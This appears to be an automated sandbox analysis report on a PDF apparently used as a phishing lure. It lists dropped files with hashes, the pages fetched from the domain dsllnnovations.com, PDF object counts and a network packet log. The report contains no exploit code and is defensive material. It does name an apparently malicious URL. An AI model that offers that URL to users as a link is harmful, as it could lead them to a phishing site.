                                                SSDEEP:48:TGufl2GL7msEHUUUUUUUUhSvR9H9vxFGiDIAEkGVvpp:lNVmswUUUUUUUUh+FGSItF
                                                MD5:64A6BB2B2037592DC383186648D44A10
                                                SHA1:1EB1428ABBF3443500470EFAC7ABDE9ED48955FC
                                                SHA-256:5EC479D41032647A4A14A2C39556995265489BA342010F97F9F2AF387590C94E
                                                SHA-512:C40337E85807050CB067DAD7867FBAE5BA90980A2316E9AED2CFA8168B2DE81154EBC98062E09BD496FB430E555B7CE8C12B249463E93EC25CFF5E6D912C7A73
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:SQLite Rollback Journal
                                                Category:dropped
                                                Size (bytes):8720
                                                Entropy (8bit):1.6076146366512007
                                                Encrypted:false
                                                SSDEEP:48:7MsKUUUUUUUUUUpvR9H9vxFGiDIAEkGVvMqFl2GL7msy:7sUUUUUUUUUUNFGSItmKVmsy
                                                MD5:3CFC6C69F50C0F796412C79FD0822851
                                                SHA1:743160072803B9E6E0503A7CB7BA540CDA813880
                                                SHA-256:E57CA447D4C70E080D82F65B9A1A9C821805F56D0A0B5A9664369D2FA756496A
                                                SHA-512:AE2CE29C4055AD149B31F70177673782B026C40328B5345C533AA66EB101C0F89A81B9ABFA124854519F08D3917ABDDEBF6EF05855B882DABFA0BD929DB9A5AA
                                                Malicious:false
                                                Preview:.... .c..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):246
                                                Entropy (8bit):3.512793808211959
                                                Encrypted:false
                                                SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8xOlQq/fH:Qw946cPbiOxDlbYnuRK5Vv
                                                MD5:98B9ADB98BC2F73DB2799F2596282D04
                                                SHA1:BEBD640F808BE697BE061ADE87E171ACB144889C
                                                SHA-256:94E46B5FDAA8D72C4409E16A2FD69CC7446641FD3C767A512036D3E3C1D86013
                                                SHA-512:A36F8CFDF9360909F7156F6E2C581627B1063D1371F11C30D2454CDBBD412583882F6E2EE004DA23B3C61CD354B15F95DEB289EB1DDE404E36A025B5A0215044
                                                Malicious:false
                                                Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.9./.1.0./.2.0.2.4. . .1.9.:.2.1.:.5.7. .=.=.=.....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393)
                                                Category:dropped
                                                Size (bytes):16525
                                                Entropy (8bit):5.345946398610936
                                                Encrypted:false
                                                SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                Malicious:false
                                                Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):16603
                                                Entropy (8bit):5.343363779805415
                                                Encrypted:false
                                                SSDEEP:384:XGa5s5b5kqWqRqj2q5qlRqTqUqSqt3J333+d7dPu5ut787Y7/7+7nMvhvtvPcZcC:1Q/p
                                                MD5:384E3F21DC129598199DB0BEEC83F003
                                                SHA1:239499D4356835FE4C0F6CCA8D31397667AFC36E
                                                SHA-256:936E73728CF9B0D8EAAA8EED4A75D15AFB1CCCF52B02488E9649063D0D689A47
                                                SHA-512:0C332743CA84F1DF40F633635421672BF6E0DB00C61D6BEC7ADA57D11D7E0AD1CFFB783CB53976B41DEDADAAB21881194291356800898A37ACDEDEB15ACC4643
                                                Malicious:false
                                                Preview:SessionID=f8b3bab3-4821-4456-846e-47bfe579fcee.1730244112290 Timestamp=2024-10-29T19:21:52:290-0400 ThreadID=4956 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=f8b3bab3-4821-4456-846e-47bfe579fcee.1730244112290 Timestamp=2024-10-29T19:21:52:293-0400 ThreadID=4956 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=f8b3bab3-4821-4456-846e-47bfe579fcee.1730244112290 Timestamp=2024-10-29T19:21:52:293-0400 ThreadID=4956 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=f8b3bab3-4821-4456-846e-47bfe579fcee.1730244112290 Timestamp=2024-10-29T19:21:52:293-0400 ThreadID=4956 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=f8b3bab3-4821-4456-846e-47bfe579fcee.1730244112290 Timestamp=2024-10-29T19:21:52:294-0400 ThreadID=4956 Component=ngl-lib_NglAppLib Description="SetConf
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):29752
                                                Entropy (8bit):5.388887121783243
                                                Encrypted:false
                                                SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rG:QL
                                                MD5:D6CB462BA78AA4194462DD0E021E9637
                                                SHA1:A5F73A95A9A41B85AF1DD95270DFEB1492E20E66
                                                SHA-256:0EEEA9349D7B0B57B94FA92FC5E7CB3AB69555AAC6561996C90B0EF31703872F
                                                SHA-512:C24F6B02754BB907599A13A80DBD58C46EEEC32320BD80B186CA07B7266564E9EED42F49E03486C10ADB7BEB9AB345EA3B19D99C47C345814D867744BFDC5B39
                                                Malicious:false
                                                Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                Category:dropped
                                                Size (bytes):1407294
                                                Entropy (8bit):7.97605879016224
                                                Encrypted:false
                                                SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                Malicious:false
                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                Category:dropped
                                                Size (bytes):758601
                                                Entropy (8bit):7.98639316555857
                                                Encrypted:false
                                                SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                MD5:3A49135134665364308390AC398006F1
                                                SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                Malicious:false
                                                Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                Category:dropped
                                                Size (bytes):386528
                                                Entropy (8bit):7.9736851559892425
                                                Encrypted:false
                                                SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                Malicious:false
                                                Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                Category:dropped
                                                Size (bytes):1419751
                                                Entropy (8bit):7.976496077007677
                                                Encrypted:false
                                                SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                Malicious:false
                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (1195), with no line terminators
                                                Category:downloaded
                                                Size (bytes):1195
                                                Entropy (8bit):5.217758772481928
                                                Encrypted:false
                                                SSDEEP:24:kTeRH8eVxvrCJjsuRpRFGLnxbFGWniu1JJSa7oRW7aRWXCunouOvTMOKFId6J39I:8eFj/e5dHGLrGW7STw2wptI8Id6w
                                                MD5:D47ECF0A434BDB4C440DD2F73744F115
                                                SHA1:249605CAC81F663AAB97B083802143CE20F64D71
                                                SHA-256:D2D64010BD30590CEB4A1EDC634AB632DBD14CE41D6BC669E7A46D05D06CA1E9
                                                SHA-512:FDF1D9F9BB340EB4DC14CE0CE5F228B3CA417F61DF3982E208B0A5964F4174E4BAE5C035AF0B59BEA8925CB1295132D019D839E1CD020299C8B2C184CBF7E720
                                                Malicious:false
                                                URL:https://dsllnnovations.com/aith/
                                                Preview:<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8da6e8395f456b4c',t:'MTczMDI0NDE0MS4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);el
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (8126), with no line terminators
                                                Category:downloaded
                                                Size (bytes):8126
                                                Entropy (8bit):5.777236232416334
                                                Encrypted:false
                                                SSDEEP:192:ZmcPmT9m5DIFMoG+93sDJHIM5P+LjtLjJAd:ZBmT9mlIFZcJo0PSAd
                                                MD5:3D079F0BDDE60BD8C21ABDFB49723A46
                                                SHA1:931ADA0E28F1C256977C56BF8C07BE4E1ADB8A0E
                                                SHA-256:4249F15658EC7A06D483E38F111DBAC7A31BAAB5D77598E32D28F4F31967F425
                                                SHA-512:53E17DEB70516030FC9683FC3239CC1F7578390824C57973ECBB417CF73C4DAD46BCA26AD7F9B176BF8520C119A8865DC332EEA9A23F2408B5D7091599869A69
                                                Malicious:false
                                                URL:https://dsllnnovations.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f2bbd6738e15/main.js?
                                                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,n,o,s,z,A){V=b,function(c,d,U,e,f){for(U=b,e=c();!![];)try{if(f=parseInt(U(462))/1*(parseInt(U(467))/2)+parseInt(U(436))/3+parseInt(U(483))/4+-parseInt(U(381))/5*(parseInt(U(401))/6)+parseInt(U(409))/7*(-parseInt(U(417))/8)+parseInt(U(460))/9*(-parseInt(U(428))/10)+parseInt(U(422))/11*(parseInt(U(465))/12),d===f)break;else e.push(e.shift())}catch(D){e.push(e.shift())}}(a,574896),h=this||self,i=h[V(445)],n=function(a0,d,e,f){return a0=V,d=String[a0(472)],e={'h':function(D){return null==D?'':e.g(D,6,function(E,a1){return a1=b,a1(383)[a1(398)](E)})},'g':function(D,E,F,a2,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(a2=a0,null==D)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[a2(394)];Q+=1)if(R=D[a2(398)](Q),Object[a2(426)][a2(382)][a2(384)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[a2(426)][a2(382)][a2(384)](H,S))J=S;else{if(Object[a2(426)][a2(382)][a2(384)](I,J)){if(256>J[a2(397)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[a2(399)](F(O)),O=0):P++,G++)
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (8126), with no line terminators
                                                Category:dropped
                                                Size (bytes):8126
                                                Entropy (8bit):5.755786371219423
                                                Encrypted:false
                                                SSDEEP:192:lIcslakUD0Yr5Uw7bp6aVP7F+P9LFAFxyovrx:lIco7UDhdUw7bp6aVP7FCrAFrF
                                                MD5:E7D6F6764AEC4BC2B331FB8B2B507F4D
                                                SHA1:039293B646BF4D74E68449AA859250EADC0876D0
                                                SHA-256:7D84BF16F66C129E752812130DAB3AC31B0BEC70A04133AC376CE7859FE33F33
                                                SHA-512:1F1D40B9750FCEFECE3E3644CD7FE0F8B3423013A7F7B6970EDF3630C49A960B672B651F33CB06105F345D148FC34864F69517EEF90E3A574822963C138B59CA
                                                Malicious:false
                                                Preview:window._cf_chl_opt={cFPWv:'g'};~function(V,h,i,j,k,o,s,x){V=b,function(d,e,U,f,g){for(U=b,f=d();!![];)try{if(g=-parseInt(U(313))/1*(-parseInt(U(292))/2)+parseInt(U(256))/3+-parseInt(U(298))/4*(parseInt(U(306))/5)+-parseInt(U(265))/6+-parseInt(U(267))/7+parseInt(U(261))/8*(parseInt(U(293))/9)+parseInt(U(294))/10*(-parseInt(U(347))/11),e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,463828),h=this||self,i=h[V(312)],j={},j[V(277)]='o',j[V(268)]='s',j[V(262)]='u',j[V(320)]='z',j[V(315)]='n',j[V(291)]='I',j[V(324)]='b',k=j,h[V(281)]=function(g,D,E,F,a0,H,I,J,K,L,M){if(a0=V,D===null||void 0===D)return F;for(H=n(D),g[a0(279)][a0(316)]&&(H=H[a0(284)](g[a0(279)][a0(316)](D))),H=g[a0(303)][a0(348)]&&g[a0(364)]?g[a0(303)][a0(348)](new g[(a0(364))](H)):function(N,a1,O){for(a1=a0,N[a1(307)](),O=0;O<N[a1(266)];N[O+1]===N[O]?N[a1(280)](O+1,1):O+=1);return N}(H),I='nAsAaAb'.split('A'),I=I[a0(356)][a0(328)](I),J=0;J<H[a0(266)];K=H[J],L=m(g,D,K),I(L)?(M='s'===L&&!g[a0(335)](D[K]),a0(34
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                Category:downloaded
                                                Size (bytes):548
                                                Entropy (8bit):4.660801881684815
                                                Encrypted:false
                                                SSDEEP:12:TvgsoCVIogs01lI5r8INGlTF5TF5TF5TF5TF5TFK:cEQtnDTPTPTPTPTPTc
                                                MD5:4B074B0B59693FA9F94FB71B175FB187
                                                SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                Malicious:false
                                                URL:https://dsllnnovations.com/favicon.ico
                                                Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                File type:PDF document, version 1.4, 1 pages
                                                Entropy (8bit):7.9809029583559905
                                                TrID:
                                                • Adobe Portable Document Format (5005/1) 100.00%
                                                File name:completedfiles.....pdf
                                                File size:96'888 bytes
                                                MD5:447b4f00cbabfcf1e20e8217542706f0
                                                SHA1:ba7e723a3956d36ac787b427d32961bacf4ba720
                                                SHA256:55a1a40e0c4cdd00c397fe47c25287c497c4f47729eb90ee49889e728bf14b90
                                                SHA512:4ff8119de3f5213c9feb5777fc0d05ecff2b1331b04047e4286677b8cfdd51f5c8cd32a88b845255c394a8863e258397713aee501962b2e8f8c21c5d86ce3156
                                                SSDEEP:1536:1wDgzR4TF8Ii2tkOLRnXYlSS3jju+JG+zZFFXmyHDXOP2Sm6TY:1wDgt3UkMcrr7jvSmEY
                                                TLSH:EC930164CAEA6C4CF580C0CE8C2E759F8D5DF19E53C92C7E2058CBC5506497AECB12EA
                                                File Content Preview:%PDF-1.4.%.....1 0 obj.<</Title (completedfiles.....pdf)./Producer (Skia/PDF m132 Google Docs Renderer)>>.endobj.3 0 obj.<</ca 1./BM /Normal>>.endobj.7 0 obj.<</CA 1./ca 1./LC 0./LJ 0./LW 1.33333337./ML 10./SA true./BM /Normal>>.endobj.9 0 obj.<</N 3./Fil
                                                Icon Hash:62cc8caeb29e8ae0

                                                General

                                                Header:%PDF-1.4
                                                Total Entropy:7.980903
                                                Total Bytes:96888
                                                Stream Entropy:7.995915
                                                Stream Bytes:91613
                                                Entropy outside Streams:5.261477
                                                Bytes outside Streams:5275
                                                Number of EOF found:1
                                                Bytes after EOF:
                                                NameCount
                                                obj27
                                                endobj27
                                                stream11
                                                endstream11
                                                xref1
                                                trailer1
                                                startxref1
                                                /Page1
                                                /Encrypt0
                                                /ObjStm0
                                                /URI2
                                                /JS0
                                                /JavaScript0
                                                /AA0
                                                /OpenAction0
                                                /AcroForm0
                                                /JBIG2Decode0
                                                /RichMedia0
                                                /Launch0
                                                /EmbeddedFile0

                                                Image Streams

                                                IDDHASHMD5Preview
                                                800000000000000006e1addb30b85b5c861aa1f51f852e073
                                                10000000000000000021c2484b0d2ea2925542333788922ee8
                                                1100000000000000002e83ab46b8921e22a156dc4e21b9d9ca
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 30, 2024 00:21:51.055886030 CET49675443192.168.2.4173.222.162.32
                                                Oct 30, 2024 00:21:57.013457060 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:57.013495922 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:57.013578892 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:57.016786098 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:57.016808987 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:57.876594067 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:57.876702070 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:57.882616043 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:57.882626057 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:57.883002996 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:57.930345058 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.022255898 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.067337036 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.265546083 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.265667915 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.265757084 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.265887022 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.265902996 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.265924931 CET49738443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.265929937 CET44349738184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.310626984 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.310663939 CET44349739184.28.90.27192.168.2.4
                                                Oct 30, 2024 00:21:58.310745001 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.311187983 CET49739443192.168.2.4184.28.90.27
                                                Oct 30, 2024 00:21:58.311203003 CET44349739184.28.90.27192.168.2.4
